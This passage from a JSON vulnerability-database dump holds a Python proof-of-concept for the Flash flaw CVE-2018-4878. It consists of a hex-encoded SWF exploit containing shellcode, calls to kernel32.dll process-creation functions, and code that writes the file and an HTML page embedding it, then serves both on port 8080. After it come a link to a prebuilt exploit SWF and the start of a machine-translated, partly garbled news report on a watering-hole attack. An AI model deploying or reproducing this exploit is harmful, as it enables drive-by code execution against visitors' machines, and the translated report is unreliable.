65\\x00\\x00\\x01\\x6C\\x07\\x72\\x65\\x61\\x64\\x55\\x54\\x46\\x01\\x76\\x00\\x01\\x75\\x00\\x01\\x70\\x00\\x01\\x74\\x00\\x01\\x63\\x01\\x72\\x00\\x00\\x00\\x00\\x01\\x73\\x00\\x02\\x62\\x30\\x01\\x62\\x06\\x76\\x61\\x72\\x5F\\x31\\x32\\x04\\x73\\x69\\x7A\\x65\\x03\\x6F\\x66\\x74\\x02\\x66\\x74\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x33\\x03\\x69\\x6E\\x74\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x30\\x06\\x70\\x61\\x72\\x61\\x6D\\x32\\x06\\x70\\x61\\x72\\x61\\x6D\\x33\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x30\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x34\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x35\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x36\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x37\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x38\\x5F\\x06\\x5F\\x6C\\x6F\\x63\\x39\\x5F\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x31\\x5F\\x07\\x5F\\x6C\\x6F\\x63\\x31\\x32\\x5F\\x09\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x30\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x37\\x30\\x06\\x56\\x65\\x63\\x74\\x6F\\x72\\x0C\\x67\\x61\\x64\\x67\\x65\\x74\\x2E\\x61\\x73\\x24\\x31\\x35\\x06\\x50\\x72\\x69\\x6D\\x69\\x74\\x0B\\x5F\\x5F\\x41\\x53\\x33\\x5F\\x5F\\x2E\\x76\\x65\\x63\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x33\\x36\\x05\\x41\\x72\\x72\\x61\\x79\\x04\\x63\\x61\\x6C\\x6C\\x05\\x61\\x70\\x70\\x6C\\x79\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x31\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x24\\x31\\x09\\x75\\x6E\\x64\\x65\\x66\\x69\\x6E\\x65\\x64\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x0F\\x72\\x65\\x61\\x64\\x55\\x6E\\x73\\x69\\x67\\x6E\\x65\\x64\\x49\\x6E\\x74\\x04\\x70\\x75\\x73\\x68\\x06\\x6C\\x65\\x6E\\x67\\x74\\x68\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x34\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x35\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x33\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x35\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x34\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x37\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x38\\x07\\x67\\x61\\x64\\x67\\x65\\x74\\x39\\x03\\x72\\x65\\x73\\x09\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x30\\x34\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x0E\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x0D\\x67\\x61\\x64\\x67\\x65\\x74\\x2F\\x67\\x61\\x64\\x67\\x65\\x74\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x31\\x34\\x35\\x03\\x31\\x37\\x37\\x03\\x32\\x39\\x32\\x03\\x33\\x38\\x32\\x04\\x33\\x32\\x31\\x32\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x30\\x04\\x34\\x34\\x31\\x34\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x32\\x31\\x35\\x02\\x39\\x33\\x00\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x37\\x02\\x63\\x72\\x02\\x6E\\x65\\x0C\\x6B\\x65\\x72\\x6E\\x65\\x6C\\x33\\x32\\x2E\\x64\\x6C\\x6C\\x0E\\x76\\x69\\x72\\x74\\x75\\x61\\x6C\\x70\\x72\\x6F\\x74\\x65\\x63\\x74\\x0E\\x63\\x72\\x65\\x61\\x74\\x65\\x70\\x72\\x6F\\x63\\x65\\x73\\x73\\x61\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x11\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x46\\x75\\x6E\\x63\\x08\\x66\\x69\\x6E\\x64\\x66\\x75\\x6E\\x63\\x3A\\x05\\x01\\x16\\x04\\x17\\x04\\x08\\x12\\x05\\x42\\x18\\x01\\x1A\\x01\\x1A\\x43\\x16\\x44\\x16\\x6C\\x16\\x6C\\x17\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x16\\x6C\\x06\\x09\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x08\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x01\\x03\\x09\\x01\\x0A\\x0C\\x04\\x05\\x06\\x07\\x08\\x09\\x08\\x01\\x0A\\x0C\\x04\\x05\\x06\\x07\\x08\\x67\\x07\\x02\\x09\\x07\\x03\\x0B\\x07\\x03\\x0C\\x07\\x03\\x0D\\x07\\x02\\x0E\\x07\\x03\\x75\\x07\\x02\\x0F\\x07\\x02\\x10\\x07\\x04\\x11\\x07\\x02\\x1A\\x07\\x03\\x02\\x07\\x02\\x16\\x07\\x03\\x2B\\x07\\x03\\x2C\\x07\\x03\\x2D\\x07\\x03\\x2E\\x07\\x03\\x2F\\x07\\x03\\x30\\x07\\x03\\x31\\x07\\x03\\x23\\x07\\x02\\x32\\x07\\x03\\x3F\\x07\\x02\\x40\\x09\\x41\\x01\\x07\\x09\\x41\\x1D\\x19\\x01\\x01\\x1B\\x02\\x07\\x03\\x45\\x07\\x03\\x46\\x07\\x02\\x47\\x07\\x04\\x48\\x07\\x04\\x49\\x07\\x02\\x4C\\x07\\x02\\x4D\\x07\\x02\\x4E\\x07\\x02\\x4F\\x07\\x04\\x50\\x07\\x02\\x51\\x07\\x03\\x52\\x07\\x03\\x53\\x07\\x03\\x54\\x07\\x03\\x29\\x07\\x03\\x55\\x07\\x03\\x56\\x07\\x03\\x57\\x07\\x03\\x58\\x07\\x03\\x59\\x07\\x03\\x5A\\x07\\x03\\x5B\\x07\\x02\\x5C\\x07\\x03\\x66\\x07\\x03\\x01\\x07\\x02\\x43\\x09\\x01\\x03\\x07\\x02\\x68\\x07\\x0A\\x6D\\x07\\x0A\\x6E\\x07\\x0A\\x6F\\x07\\x0C\\x66\\x07\\x0A\\x0E\\x07\\x0A\\x16\\x07\\x0A\\x47\\x07\\x0A\\x4C\\x07\\x0A\\x09\\x1D\\x19\\x01\\x40\\x07\\x0A\\x4D\\x07\\x0A\\x4E\\x07\\x0A\\x0F\\x07\\x0A\\x4F\\x07\\x0A\\x51\\x09\\x41\\x04\\x1D\\x19\\x01\\x40\\x07\\x0C\\x46\\x07\\x0C\\x52\\x07\\x0C\\x53\\x07\\x0C\\x0C\\x07\\x0C\\x3F\\x07\\x0C\\x0B\\x07\\x0C\\x45\\x07\\x0C\\x02\\x07\\x0A\\x40\\x1D\\x19\\x01\\x40\\x1B\\x05\\x07\\x0A\\x1A\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x0D\\x07\\x0C\\x76\\x07\\x0A\\x10\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x77\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x0C\\x78\\x1D\\x19\\x01\\x40\\x1D\\x19\\x01\\x40\\x07\\x00\\x00\\x04\\x00\\x01\\x00\\x40\\x08\\x8C\\x01\\x01\\x03\\x06\\x00\\x40\\x33\\x02\\x03\\x00\\x40\\x40\\x40\\x4A\\x80\\x06\\x34\\x35\\x00\\x00\\x5D\\x02\\x00\\x00\\x5E\\x00\\x00\\x00\\x04\\x00\\x08\\x5F\\x01\\x60\\x61\\x5F\\x01\\x60\\x62\\x5F\\x01\\x60\\x63\\x5F\\x01\\x60\\x64\\x5F\\x01\\x60\\x65\\x5F\\x01\\x60\\x67\\x69\\x01\\x60\\x6A\\x5F\\x01\\x60\\x6B\\x01\\x34\\x35\\x09\\x06\\x00\\x05\\x00\\x00\\x06\\x5F\\x40\\x01\\x40\\x00\\x01\\x00\\x06\\x40\\x02\\x01\\x00\\x01\\x01\\x4D\\x51\\x03\\x01\\x01\\x02\\x64\\x51\\x04\\x02\\x01\\x03\\x4B\\x51\\x05\\x03\\x01\\x04\\x3B\\x51\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x34\\x44\\x00\\x00\\x02\\x06\\x07\\x07\\x00\\x08\\x01\\x04\\x05\\x0D\\xD0\\x30\\xEF\\x01\\x02\\x00\\x09\\xEF\\x01\\x03\\x01\\x0A\\x47\\x00\\x00\\x01\\x08\\x03\\x04\\x05\\x01\\x47\\x00\\x00\\x02\\x0C\\x03\\x05\\x0A\\xA4\\x06\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x65\\x01\\x24\\x00\\x74\\x6D\\x02\\xF0\\x19\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x65\\x01\\x24\\x00\\x74\\x6D\\x04\\xF0\\x1B\\x65\\x01\\x24\\x00\\x74\\x6D\\x05\\xF0\\x1C\\x65\\x01\\x24\\x00\\x74\\x6D\\x06\\x65\\x01\\x24\\x00\\x74\\x6D\\x07\\xF0\\x1E\\x65\\x01\\x24\\x00\\x73\\x6D\\x08\\x65\\x01\\x5D\\x4E\\x5D\\x4C\\x5D\\x57\\x66\\x57\\x46\\x4C\\x01\\x46\\x4E\\x01\\x2F\\x01\\xA8\\x74\\x6D\\x01\\x65\\x01\\x65\\x01\\x6C\\x01\\x2D\\x02\\xA1\\x74\\x6D\\x02\\x10\\x3B\\x00\\x00\\x09\\xF0\\x26\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x46\\x4E\\x01\\x2D\\x03\\xA8\\x25\\xCD\\xB4\\x01\\x14\\x0D\\x00\\x00\\xF0\\x28\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x10\\x22\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\x65\\x01\\x65\\x01\\x6C\\x02\\x2D\\x04\\xA1\\x74\\x6D\\x02\\x65\\x01\\x6C\\x03\\x25\\x80\\x04\\x15\\xBA\\xFF\\xFF\\x65\\x01\\x6C\\x01\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x30\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x32\\x5E\\x58\\x65\\x01\\x6C\\x02\\x61\\x58\\xF0\\x33\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x24\\x3C\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x46\\x4E\\x01\\x25\\xD0\\x8A\\x01\\x14\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x36\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x84\\x01\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x04\\xF0\\x39\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x80\\x01\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x65\\x01\\x24\\x03\\x24\\x04\\xA2\\x74\\x6D\\x03\\x10\\x70\\x00\\x00\\x09\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x46\\x4E\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x24\\x0C\\x46\\x59\\x01\\x46\\x09\\x00\\x2C\\x72\\x14\\x35\\x00\\x00\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x03\\x24\\x04\\xA2\\xA1\\x46\\x4E\\x01\\x74\\x6D\\x05\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x04\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x06\\xF0\\x42\\x10\\x1B\\x00\\x00\\x65\\x01\\x65\\x01\\x6C\\x03\\x24\\x05\\x24\\x04\\xA2\\xA0\\x74\\x6D\\x03\\x65\\x01\\x6C\\x03\\x65\\x01\\x6C\\x04\\x15\\x84\\xFF\\xFF\\x65\\x01\\x6C\\x05\\x24\\x00\\xAB\\x76\\x2A\\x76\\x11\\x09\\x00\\x00\\x29\\x65\\x01\\x6C\\x06\\x24\\x00\\xAB\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x48\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x4A\\x65\\x01\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x02\\xA0\\x74\\x6D\\x05\\xF0\\x4B\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x10\\xE9\\x00\\x00\\x09\\xF0\\x4E\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x05\\x46\\x4E\\x01\\x74\\x6D\\x01\\x65\\x01\\x6C\\x01\\x24\\x00\\x14\\x0A\\x00\\x00\\xF0\\x51\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x73\\x14\\x38\\x00\\x00\\xF0\\x56\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\x57\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x0E\\x58\\x00\\x00\\x10\\x7E\\x00\\x00\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x74\\x13\\x04\\x00\\x00\\x10\\x31\\x00\\x00\\x5E\\x5F\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x5F\\xF0\\x63\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x17\\x2A\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\xF0\\x6B\\x65\\x01\\x65\\x01\\x6C\\x05\\x24\\x04\\xA0\\x74\\x6D\\x05\\xF0\\x4C\\x65\\x01\\x6C\\x03\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\x06\\xFF\\xFF\\x65\\x01\\x6C\\x07\\x48\\xF0\\x6F\\x10\\x17\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\x71\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x24\\x00\\x48\\x01\\x46\\x84\\x06\\x8A\\x06\\x3C\\x3D\\x08\\x0D\\x00\\x01\\x01\\x00\\x0E\\x00\\x02\\x01\\x00\\x0F\\x00\\x03\\x01\\x00\\x10\\x00\\x04\\x01\\x00\\x11\\x00\\x05\\x01\\x00\\x12\\x00\\x06\\x01\\x00\\x13\\x00\\x07\\x01\\x00\\x14\\x00\\x08\\x15\\x00\\x03\\x0D\\x0D\\x04\\x05\\x86\\x03\\xD0\\x30\\x24\\x00\\x74\\x63\\x04\\x5D\\x4D\\x46\\x4D\\x00\\x29\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x63\\x05\\xF0\\x7C\\x5D\\x4E\\x5D\\x4E\\x5D\\x4E\\x62\\x05\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x14\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x46\\x4E\\x01\\x5D\\x51\\x66\\x51\\x96\\x96\\x12\\x08\\x00\\x00\\x25\\xBC\\x01\\x82\\x10\\x04\\x00\\x00\\x25\\xB0\\x01\\x82\\xA0\\x74\\x63\\x06\\xF0\\x7D\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x2D\\x04\\x15\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x7F\\x62\\x06\\x24\\x04\\xA0\\x74\\x63\\x06\\xF0\\x81\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x06\\xF0\\x82\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x07\\xF0\\x83\\x01\\x5D\\x4E\\x62\\x05\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x74\\x63\\x08\\xF0\\x84\\x01\\x5D\\x4E\\x62\\x05\\x24\\x20\\xA0\\x46\\x4E\\x01\\x74\\x63\\x09\\xF0\\x85\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x25\\x80\\x02\\x42\\x01\\x80\\x5A\\x63\\x0A\\x10\\x24\\x00\\x00\\x09\\xF0\\x88\\x01\\x62\\x0A\\x62\\x04\\x5D\\x4E\\x62\\x07\\x25\\x80\\x01\\xA1\\x62\\x04\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x53\\xF0\\x89\\x01\\x62\\x04\\x91\\x74\\x63\\x04\\xF0\\x86\\x01\\x62\\x04\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\xCC\\xFF\\xFF\\xF0\\x8B\\x01\\x62\\x0A\\x24\\x20\\x24\\x07\\xA0\\xD1\\x61\\x53\\xF0\\x8C\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\xD2\\x46\\x4F\\x02\\x29\\xF0\\x8D\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\xD3\\x46\\x4F\\x02\\x29\\xF0\\x8E\\x01\\x5D\\x4F\\x62\\x06\\x5D\\x49\\x62\\x0A\\x46\\x49\\x01\\x25\\x80\\x01\\xA0\\x46\\x4F\\x02\\x29\\xF0\\x8F\\x01\\x5D\\x3E\\x24\\x41\\x4A\\x3E\\x01\\x80\\x3E\\x63\\x0B\\xF0\\x90\\x01\\x5D\\x4D\\x66\\x4D\\x66\\x1F\\x20\\x62\\x0B\\x46\\x20\\x02\\x82\\x63\\x0C\\xF0\\x91\\x01\\x5D\\x4F\\x62\\x06\\x62\\x07\\x46\\x4F\\x02\\x29\\xF0\\x92\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\x62\\x08\\x46\\x4F\\x02\\x29\\xF0\\x93\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\x62\\x09\\x46\\x4F\\x02\\x29\\xF0\\x94\\x01\\x47\\x00\\x00\\x04\\x0C\\x03\\x05\\x0A\\x92\\x03\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x6D\\x02\\xF0\\x98\\x01\\x65\\x01\\x20\\x80\\x3E\\x6D\\x01\\xF0\\x99\\x01\\x65\\x01\\x20\\x80\\x65\\x6D\\x03\\xF0\\x9F\\x01\\x65\\x01\\x5D\\x3F\\x66\\x3F\\x82\\x6D\\x08\\xF0\\xA0\\x01\\x65\\x01\\x20\\x85\\x6D\\x09\\xF0\\xA4\\x01\\xF0\\xA4\\x01\\x65\\x01\\x56\\x00\\x80\\x3E\\x6D\\x01\\xF0\\xA5\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x24\\x00\\x61\\x44\\xF0\\xA6\\x01\\x65\\x01\\x24\\x00\\x73\\x6D\\x02\\x10\\x24\\x00\\x00\\x09\\xF0\\xA7\\x01\\x65\\x01\\x6C\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x46\\x45\\x00\\x46\\x25\\x01\\x29\\xF0\\xA6\\x01\\x65\\x01\\x65\\x01\\x6C\\x02\\x24\\x04\\xA0\\x73\\x6D\\x02\\x65\\x01\\x6C\\x02\\x5D\\x42\\x66\\x42\\x66\\x43\\x66\\x46\\x15\\xCC\\xFF\\xFF\\xF0\\xA8\\x01\\x65\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x64\\x65\\x01\\x6C\\x01\\x41\\x01\\x80\\x66\\x6D\\x03\\xF0\\xAA\\x01\\x65\\x01\\x5D\\x49\\x65\\x01\\x6C\\x03\\x46\\x49\\x01\\x74\\x6D\\x04\\xF0\\xAC\\x01\\x65\\x01\\x5D\\x64\\x46\\x64\\x00\\x74\\x6D\\x05\\xF0\\xAD\\x01\\x65\\x01\\x6C\\x05\\x24\\x00\\x13\\x04\\x00\\x00\\x10\\x0B\\x00\\x00\\xF0\\xAF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x4B\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x04\\x65\\x01\\x6C\\x03\\x66\\x46\\x24\\x04\\xA2\\x46\\x4B\\x03\\x29\\x65\\x01\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x6D\\x06\\xF0\\xB4\\x01\\x65\\x01\\x5D\\x4E\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x74\\x6D\\x06\\xF0\\xB5\\x01\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\xB6\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x04\\x46\\x4F\\x02\\x29\\xF0\\xB8\\x01\\x65\\x01\\x5D\\x4D\\x66\\x4D\\x20\\x5D\\x5F\\x66\\x5F\\x46\\x1F\\x02\\x82\\x6D\\x08\\xF0\\xBA\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x07\\x46\\x4F\\x02\\x29\\x47\\x10\\x18\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\xBF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\xC2\\x01\\x47\\x01\\x35\\xF2\\x02\\xF6\\x02\\x3C\\x3D\\x09\\x29\\x00\\x01\\x1E\\x00\\x2A\\x00\\x02\\x15\\x00\\x2B\\x00\\x03\\x1A\\x00\\x2C\\x00\\x04\\x01\\x00\\x2D\\x00\\x05\\x01\\x00\\x2E\\x00\\x06\\x01\\x00\\x2F\\x00\\x07\\x01\\x00\\x30\\x00\\x08\\x00\\x00\\x31\\x00\\x09\\x32\\x00\\x05\\x08\\x01\\x05\\x06\\x0E\\xF1\\x05\\xF0\\x0C\\xD0\\x30\\xF0\\x0E\\xD0\\x49\\x00\\xF0\\x0F\\x47\\x00\\x00\\x06\\x09\\x01\\x01\\x04\\x3D\\xD0\\x30\\x10\\x05\\x00\\x00\\x41\\x05\\x03\\x58\\x04\\xF1\\x05\\xF0\\x07\\x5D\\x36\\x5D\\x37\\x66\\x37\\x10\\x04\\x00\\x00\\x16\\x1F\\x00\\x00\\x30\\x5D\\x35\\x66\\x35\\x30\\x5D\\x35\\x66\\x35\\x58\\x00\\x1D\\x26\\x11\\x06\\x00\\x00\\x47\\x70\\x45\\x0A\\x10\\xD5\\x1D\\x68\\x34\\xF1\\x05\\xF0\\x05\\x47\\x00\\x00\\x1C\\x13\\x02\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x40\\x00\\x00\\x00\"\r\n\r\n\r\nprint \"[+] CVE-2018-4878 poc \"\r\nprint \"[x] files created\"\r\n\r\nswf = \"%s.swf\" % flash_name\r\n \r\nhtml = \"\"\"\r\n<!DOCTYPE html>\r\n<html>\r\n\r\n\"\"\" + \"<embed src=\\\"\" + swf + \"\\\"></embed>\" + \"\"\"\r\n</html>\r\n\"\"\"\r\n \r\nf = open(\"%s\" % swf, \"wb\")\r\nf.write(data)\r\nf.close()\r\n \r\nf = open(\"index.html\", \"wb\")\r\nf.write(html)\r\nf.close()\r\n\r\n\r\nHandlerClass = SimpleHTTPRequestHandler\r\nServerClass = BaseHTTPServer.HTTPServer\r\nProtocol = \"HTTP/1.0\"\r\n\r\n\r\nport = 8080\r\nserver_address = ('0.0.0.0', port)\r\n\r\nHandlerClass.protocol_version = Protocol\r\nhttpd = ServerClass(server_address, HandlerClass)\r\n\r\nsa = httpd.socket.getsockname()\r\nprint \"Server ready\", sa[0], \"port\", sa[1], \"...\"\r\nhttpd.serve_forever()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30119", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-05-24T18:03:14", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2018-05-24T00:00:00", "type": "zdt", "title": "Flash ActiveX 28.0.0.137 - Code Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30432", "href": "https://0day.today/exploit/description/30432", "sourceData": "## CVE-2018-4878 \r\n \r\nPop up a calculator - Requires Flash ActiveX 28.0.0.137\r\n \r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44745.swf\n\n# 0day.today [2018-05-24] #", "sourceHref": "https://0day.today/exploit/30432", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "myhack58": [{"lastseen": "2018-04-10T16:18:56", "description": "! [](/Article/UploadPic/2018-4/2018410185227201. jpg? www. myhack58. com) \nEarlier, a researchers found that a Hong Kong Telecommunications Company website hacking attack, 3 May 21, Morphisec laboratory on the site of attack to carry out the investigation, investigators eventually found that the telecommunications company of the Group's official website was hacked, the home page home. php is embedded with a Flash exploit CVE-2018-4878 exploit file. \nAttack overview \nThe attack was an example of a textbook targeted\u201cwatering hole attack\u201d, the attacker through the target victims may access on the website of the implant malicious software or code, to induce the victim system to be infected, giving an attacker the open portal, this attack used in cyber espionage on. Morphisec survey found that the watering hole attack with a very high level of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)escape features: attack is completely without documents, in the victim on the 